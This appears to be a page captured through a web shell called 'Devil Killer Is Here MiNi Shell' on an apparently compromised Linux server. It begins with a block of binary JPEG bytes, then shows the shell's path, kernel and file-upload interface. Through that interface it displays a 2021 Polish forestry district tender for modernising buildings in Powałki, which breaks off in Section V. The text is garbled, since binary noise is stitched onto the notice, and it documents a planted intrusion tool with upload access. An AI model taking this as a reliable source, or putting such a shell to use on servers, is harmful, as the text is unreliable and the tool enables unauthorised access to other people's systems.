JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210720/0012018601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00120186 z dnia 2021-07-20</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja budynku mieszkalnego i gospodarczego w leśnictwie Powałki - postępowanie nr 2 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa PGL Lasy Państwowe Nadleśnictwo Rytel</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 090550740</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rytel-Dworzec 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rytel</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-642</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL637 - Chojnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">52 334 18 50</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">52 334 18 51</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rytel@torun.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rytel.torun.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja budynku mieszkalnego i gospodarczego w leśnictwie Powałki - postępowanie nr 2 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6dec2c98-e928-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00120186</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00068588/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja budynku mieszkalnego i gospodarczego leśniczówki w Powałkach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> josephine.proebiz.com/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">josephine.proebiz.com/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, cyfrowego odwzorowania dokumentów w postaci papierowej (elektronicznych kopii dokumentów stworzonych w postaci papierowej) oraz informacji przekazywanych przy ich użyciu opisane zostały JOSEPHINE – Skrócona Instrukcja – Wykonawca, która dostępna jest w zakładce Biblioteka instrukcji i linków w prawym, górnym rogu ekranu głównego portalu JOSEPHINE.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L<br/>119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych<br/>jest Nadleśnictwo Rytel, Rytel-Dworzec 4, 89-642 Rytel. Administrator wyznaczył Inspektora Ochrony<br/>Danych Osobowych p. Patryka Makowskiego, z którym w sprawach dotyczących przetwarzania danych<br/>osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod adresem iod@compnet.<br/>pl lub telefonicznie pod numerem 796 400 977 .</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZG.270.11.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 415030,07 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na modernizacji budynku mieszkalnego w leśnictwie Powałki, znajdującego się pod adresem: Klosnowo 6D, 89- 620 Klosnowo, dz. geod. nr 3168/3.Jest to budynek parterowy z poddaszem częściowo użytkowym, podpiwniczony z dachem wielospadowym krytym blachodachówką. Budynek<br/>wykonany w technologii tradycyjnej: ściany z cegły ceramicznej, strop nad parterem drewniany, konstrukcja dachowa drewniana w układzie płatwiowo-kleszczowym. Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru robót budowlanych, stanowiące Załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 274762,52 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45422000-1 - Roboty ciesielskie</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">110 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP, stanowiących nie więcej niż 15% wartości realizowanego zamówienia podstawowego.<br/>Zamówienia te polegać będą na wykonaniu podobnych robót budowlanych do opisanych w dokumentacji projektowej. Dopuszcza się również możliwość wykonania tych robót przy użyciu innych materiałów niż w przypadku robót podstawowych, a także z zastosowaniem innych technologii.<br/>Udzielane zamówienia będą realizowane na zasadach umowy podstawowej. Wynagrodzenie Wykonawcy ustalane będzie w oparciu o normatywne nakłady czasu pracy, zużycia materiałów i pracy sprzętu wg odpowiednich Katalogów Nakładów Rzeczowych (dalej: KNR), przy zastosowaniu tych samych norm, standardów i parametrów jak w przypadku robót podstawowych. Zamówienia te mogą zostać udzielone w okresie 3 lat od dnia udzielenia zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert w każdym Pakiecie Zamawiający będzie się kierował<br/>następującym kryterium oceny ofert: Cena -60%, Okres gwarancji- 40 %.<br/>Sposób obliczania punktów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>C = Cn/Co x100 pkt x 60 %<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w Ofercie dla danego<br/>Pakietu (załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do<br/>powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i<br/>usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od<br/>towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>2) W ramach kryterium "Okres gwarancji" punkty zostaną przyznane w następujący sposób:<br/>- największą liczbę punktów – 40 otrzyma oferta zawierająca najdłuższy okres gwarancji, a każda<br/>następna oferta zgodnie ze wzorem:<br/>G = Gn/Go x100 pkt x 40 %<br/>gdzie:<br/>G – liczba punktów w ramach kryterium „Okres gwarancji”,<br/>Go – najdłuższy okres gwarancji spośród ofert ocenianych<br/>Gn – okres gwarancji oferty ocenianej<br/>W kryterium okres gwarancji należy podać liczbę pełnych miesięcy, na które wykonawca udzieli<br/>gwarancji jakości na wykonany przedmiot zamówienia, udzielanego w ramach niniejszego<br/>postępowania licząc od dnia wykonania robót, stanowiących przedmiot zamówienia, wskazanego w<br/>podpisanym przez strony, a co najmniej przez Zamawiającego, protokole odbioru końcowego<br/>przedmiotu zamówienia. Informację o oferowanym okresie gwarancji należy zawrzeć w formularzu<br/>ofertowym – wzór załącznik nr 1 do SWZ.<br/>Minimalny okres gwarancji, który może zaoferować Wykonawca wynosi 24 miesiące . W przypadku<br/>podania przez Wykonawcę krótszego niż wymagany okres gwarancji lub nie podanie gwarancji, oferta<br/>Wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 PZP jako niezgodna z warunkami<br/>zamówienia.<br/>Maksymalny okres gwarancji, który może zaoferować Wykonawca wynosi 60 miesięcy. Jeżeli<br/>Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy, do oceny zostanie przyjęty okres 60<br/>miesięcy i taki uwzględniony również w umowie.<br/>Za najkorzystniejszą ofertę w danym Pakiecie uznana zostanie Oferta wykonawcy, która uzyska<br/>największą końcową liczbę punktów, stanowiącą sumę punktów przyznanych w każdym kryterium<br/>oddzielnie.<br/>Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty<br/>o takiej samej cenie i okresie gwarancji, Zamawiający wzywa wykonawców, którzy złożyli te oferty, do<br/>złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Ocena ofert zostanie dokonana oddzielnie dla każdego Pakietu.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada wszystkim wymaganiom<br/>przedstawionym w PZP oraz SWZ i została oceniona jako najkorzystniejsza w oparciu o podane<br/>powyżej kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwaracji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na modernizacji<br/>budynku gospodarczego w leśnictwie Powałki, znajdującego się pod adresem: Klosnowo 6D,<br/>89-620 Klosnowo, dz. geod. nr 3168/3.Jest to budynek parterowy murowany z cegły ceramicznej<br/>oraz bloczków betonowych, niepodpiwniczony bez poddasza użytkowego, z dachem<br/>dwuspadowym. Konstrukcja dachu drewniana krokwiowo – jętkowa, pokrycie dachówka. Modernizacja budynku polegała będzie na dostosowaniu budynku tak, by był wyposażony w dwa pomieszczenia garażowe, podręczny magazynek leśnictwa oraz zadaszenie na gromadzenie opału lub innych materiałów.Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru robót budowlanych, stanowiące Załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 140267,55 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45422000-1 - Roboty ciesielskie</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">110 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1<br/>pkt 7 PZP, stanowiących nie więcej niż 15% wartości realizowanego zamówienia podstawowego.<br/>Zamówienia te polegać będą na wykonaniu podobnych robót budowlanych do opisanych w<br/>dokumentacji projektowej. Dopuszcza się również możliwość wykonania tych robót przy użyciu innych<br/>materiałów niż w przypadku robót podstawowych, a także z zastosowaniem innych technologii.<br/>Udzielane zamówienia będą realizowane na zasadach umowy podstawowej. Wynagrodzenie Wykonawcy ustalane będzie w oparciu o normatywne nakłady czasu pracy, zużycia materiałów i pracy sprzętu wg odpowiednich Katalogów Nakładów Rzeczowych (dalej: KNR), przy zastosowaniu tych samych norm, standardów i parametrów jak w przypadku robót podstawowych. Zamówienia te mogą zostać udzielone w okresie 3 lat od dnia udzielenia zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert w każdym Pakiecie Zamawiający będzie się kierował następującym kryterium oceny ofert: Cena – 60 %, Okres gwarancji- 40 %.<br/>Sposób obliczania punktów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>C = Cn/Co x100 pkt x 60 %<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w Ofercie dla danego<br/>Pakietu (załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do<br/>powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i<br/>usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od<br/>towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>2) W ramach kryterium "Okres gwarancji" punkty zostaną przyznane w następujący sposób:<br/>- największą liczbę punktów – 40 otrzyma oferta zawierająca najdłuższy okres gwarancji, a każda<br/>następna oferta zgodnie ze wzorem:<br/>G = Gn/Go x100 pkt x 40 %<br/>gdzie:<br/>G – liczba punktów w ramach kryterium „Okres gwarancji”,<br/>Go – najdłuższy okres gwarancji spośród ofert ocenianych<br/>Gn – okres gwarancji oferty ocenianej<br/>W kryterium okres gwarancji należy podać liczbę pełnych miesięcy, na które wykonawca udzieli<br/>gwarancji jakości na wykonany przedmiot zamówienia, udzielanego w ramach niniejszego<br/>postępowania licząc od dnia wykonania robót, stanowiących przedmiot zamówienia, wskazanego w<br/>podpisanym przez strony, a co najmniej przez Zamawiającego, protokole odbioru końcowego<br/>przedmiotu zamówienia. Informację o oferowanym okresie gwarancji należy zawrzeć w formularzu<br/>ofertowym – wzór załącznik nr 1 do SWZ.<br/>Minimalny okres gwarancji, który może zaoferować Wykonawca wynosi 24 miesiące . W przypadku<br/>podania przez Wykonawcę krótszego niż wymagany okres gwarancji lub nie podanie gwarancji, oferta<br/>Wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 PZP jako niezgodna z warunkami<br/>zamówienia.<br/>Maksymalny okres gwarancji, który może zaoferować Wykonawca wynosi 60 miesięcy. Jeżeli<br/>Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy, do oceny zostanie przyjęty okres 60<br/>miesięcy i taki uwzględniony również w umowie.<br/>Za najkorzystniejszą ofertę w danym Pakiecie uznana zostanie Oferta wykonawcy, która uzyska<br/>największą końcową liczbę punktów, stanowiącą sumę punktów przyznanych w każdym kryterium<br/>oddzielnie.<br/>Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty<br/>o takiej samej cenie i okresie gwarancji, Zamawiający wzywa wykonawców, którzy złożyli te oferty, do<br/>złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Ocena ofert zostanie dokonana oddzielnie dla każdego Pakietu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> 